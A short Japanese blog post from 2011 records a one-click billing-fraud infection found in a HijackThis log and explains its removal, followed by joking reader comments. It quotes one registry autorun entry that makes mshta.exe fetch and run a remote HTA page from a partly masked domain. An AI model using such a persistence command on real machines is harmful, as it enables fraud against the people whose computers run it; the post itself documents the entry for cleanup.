【ウイルス】HTAファイルを利用したワンクリ詐欺サイト【備忘録】
皆様こんにちは、ボタンがあったら即押したい、海があったら釣りしたい、穴があったら入りたい、けーすけで、御座います。
如何お過ごしでしょうか。
久し振りにイイ生ログが採取出来たから備忘録。
昆虫採集の時期ですなぁ。
HijackThisのログに見事にエントリ出ますね。
不正なワンクリ詐欺のポップアップ出るケース。
O4 - HKCU\..\Run: [Skyae9564_5403404] "C:\WINDOWS\system32\mshta.exe" "http://****.movie109.info/dkbpl/GV0eaZ8l9jTPyeG3b8Pf5g.jsp"
HijackThisのスキャンで上記エントリをFix。mshta.exeのプロセスを停止して再起動で対応終了のようだ。
mshta.exeファイル自体は普通のMSの正規ファイルなのでファイルはそのまま。
なかなか見事だね、これ。
・INTERNET Watch の情報サイト
コメント[4]
なにっ!穴があったら入れたいとな!!!
Posted by ちぇっ at 2011年7月 8日 21:51 | 返信
No.3913のちぇっさんのコメントへの返信
何故バレたし?!ww
Posted by けーすけ
at 2011年7月 9日 01:59 | 返信
バレた???ってか入力ミスかと!!!
あなたなら、当然!
Posted by ちぇっ at 2011年7月10日 15:39 | 返信
No.3919のちぇっさんのコメントへの返信
フォッフォッフォ
くるしゅうない
Posted by けーすけ
at 2011年7月11日 00:10 | 返信
コメントする